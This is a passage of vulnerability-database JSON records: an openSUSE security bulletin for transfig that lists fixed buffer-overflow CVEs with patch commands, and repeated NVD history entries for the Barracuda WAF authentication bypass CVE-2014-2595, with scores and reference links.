["OPENVAS:1361412562310877368", "OPENVAS:1361412562310892073", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877387"]}, {"type": "fedora", "idList": ["FEDORA:73FB862622DB", "FEDORA:983DF624CFF6", "FEDORA:B794B627F4F0", "FEDORA:20E71304CBA3", "FEDORA:9C4BF3072F18", "FEDORA:E540F6253477"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC", "DEBIAN:DLA-2778-1:13AF6"]}], "modified": "2021-10-23T02:26:22", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-10-23T02:26:22", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "3.2.8a-lp152.6.6.2", "packageFilename": "transfig-3.2.8a-lp152.6.6.2.x86_64.rpm", "packageName": "transfig"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "3.2.8a-lp152.6.6.2", "packageFilename": "transfig-debuginfo-3.2.8a-lp152.6.6.2.x86_64.rpm", "packageName": "transfig-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "3.2.8a-lp152.6.6.2", "packageFilename": "transfig-debugsource-3.2.8a-lp152.6.6.2.x86_64.rpm", "packageName": "transfig-debugsource"}], "_object_type": "robots.models.suse.SuseBulletin", "_object_types": ["robots.models.suse.SuseBulletin", "robots.models.base.Bulletin"]}, {"id": "OPENSUSE-SU-2021:2454-1", "hash": "df17baaa8d44117dd13bebc84a67ae65", "type": "suse", "bulletinFamily": "unix", "title": "Security update for transfig (moderate)", "description": "An update that fixes 5 vulnerabilities is now available.\n\nDescription:\n\n This update for transfig fixes the following issues:\n\n Update to version 3.2.8, including fixes for\n\n - CVE-2021-3561: overflow in fig2dev/read.c in function read_colordef()\n (bsc#1186329).\n - CVE-2019-19797: out-of-bounds write in read_colordef in read.c\n (bsc#1159293).\n - CVE-2019-19555: stack-based buffer overflow because of an incorrect\n sscanf (bsc#1161698).\n - CVE-2019-19746: segmentation fault and out-of-bounds write because of an\n integer overflow via a large arrow type (bsc#1159130).\n - CVE-2019-14275: stack-based buffer overflow in the calc_arrow function\n in bound.c (bsc#1143650).\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2021-2454=1", "published": "2021-07-22T16:24:33", "modified": "2021-07-22T16:24:33", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RK4BRVCUPZKN5VS2JGWBPYITONWJCIZJ/", "reporter": "Suse", "references": [], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-10-24T14:26:40", "history": [], "viewCount": 167, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2021-1318.NASL", "FEDORA_2020-6A2824178E.NASL", "DEBIAN_DLA-2778.NASL", "SUSE_SU-2021-2454-1.NASL", "AL2_ALAS-2021-1682.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2021-2454.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2020-1806-1.NASL", "SUSE_SU-2021-14823-1.NASL", "OPENSUSE-2021-1143.NASL", "AL2_ALAS-2020-1398.NASL", "SUSE_SU-2021-3124-1.NASL", "OPENSUSE-2020-1702.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19746", "UB:CVE-2019-19797", "UB:CVE-2019-19555", "UB:CVE-2019-14275"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-14275", "RH:CVE-2021-3561", "RH:CVE-2019-19797", "RH:CVE-2019-19746", "RH:CVE-2019-19555"]}, {"type": "cve", "idList": ["CVE-2019-19797", "CVE-2019-14275", "CVE-2021-3561", "CVE-2019-19555", "CVE-2019-19746"]}, {"type": "amazon", "idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877368", "OPENVAS:1361412562310892073", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877387"]}, {"type": "fedora", "idList": ["FEDORA:73FB862622DB", "FEDORA:983DF624CFF6", "FEDORA:B794B627F4F0", "FEDORA:20E71304CBA3", "FEDORA:9C4BF3072F18", "FEDORA:E540F6253477"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC", "DEBIAN:DLA-2778-1:13AF6"]}], "modified": "2021-10-23T02:26:33", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-10-23T02:26:33", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "aarch64", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-3.2.8a-4.12.2.aarch64.rpm", "packageName": "transfig"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "ppc64le", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-3.2.8a-4.12.2.ppc64le.rpm", "packageName": "transfig"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "s390x", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-3.2.8a-4.12.2.s390x.rpm", "packageName": "transfig"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-3.2.8a-4.12.2.x86_64.rpm", "packageName": "transfig"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "aarch64", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-debuginfo-3.2.8a-4.12.2.aarch64.rpm", "packageName": "transfig-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "ppc64le", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-debuginfo-3.2.8a-4.12.2.ppc64le.rpm", "packageName": "transfig-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "s390x", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-debuginfo-3.2.8a-4.12.2.s390x.rpm", "packageName": "transfig-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-debuginfo-3.2.8a-4.12.2.x86_64.rpm", "packageName": "transfig-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "aarch64", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-debugsource-3.2.8a-4.12.2.aarch64.rpm", "packageName": "transfig-debugsource"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "ppc64le", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-debugsource-3.2.8a-4.12.2.ppc64le.rpm", "packageName": "transfig-debugsource"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "s390x", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-debugsource-3.2.8a-4.12.2.s390x.rpm", "packageName": "transfig-debugsource"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "3.2.8a-4.12.2", "packageFilename": "transfig-debugsource-3.2.8a-4.12.2.x86_64.rpm", "packageName": "transfig-debugsource"}], "_object_type": "robots.models.suse.SuseBulletin", "_object_types": ["robots.models.suse.SuseBulletin", "robots.models.base.Bulletin"]}], "cve": [{"bulletinFamily": "NVD", "hash": "6a0ace8cdb63863b470e6561269f441d83851201520bc6a55e7930a925c15e3a", "id": "CVE-2014-2595", "lastseen": "2021-04-22T23:44:08", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "cvelist": ["CVE-2014-2595"], "viewCount": 73, "modified": "2020-02-20T15:55:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "edition": 8, "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-13T14:29:47", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-13T14:29:47", "value": 6.9, "vector": "NONE"}}, "hash": "0d148bb322c927927cf5c8adaba4daf0d811bf2bee4917f93ca62ca2f942333e", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23075837e6c728c8f0077b2ae5d5ee7f", "key": "modified"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-13T14:29:47", "modified": "2020-02-12T13:07:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-13T14:29:47"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-02-12T14:27:29", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-12T14:27:29", "value": 6.9, "vector": "NONE"}}, "hash": "6ccf8f84237981876cda9914b348e4e11c8972875cdf630f59422732f1ea69ba", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-12T14:27:29", "modified": "2020-02-12T01:15:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["modified"], "edition": 2, "lastseen": "2020-02-12T14:27:29"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-10-03T12:01:15", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-10-03T12:01:15", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [], "hash": "65fabd8c3b92ccbba797b3dfba517234b9e0e8bc2464531f2cd64047dd457870", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-10-03T12:01:15", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-10-03T12:01:15"}, {"bulletin": {"affectedSoftware": [{"name": "barracuda web_application_firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-02-21T13:06:26", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-02-21T13:06:26", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "4423bdd8d6936961112ee89e752cf7c866f443470052f4a4ac3529b4be6ae18f", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}, {"hash": "ee2d931efb4c4fa7a1a321df76c0b838", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-21T13:06:26", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 47}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 4, "lastseen": "2020-02-21T13:06:26"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T06:14:28", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2021-02-02T06:14:28", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "hash": "d6e72c33ebf3accfe25046812d0b1e7698f2d37c9159defa7c7bda26e2ab359b", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": 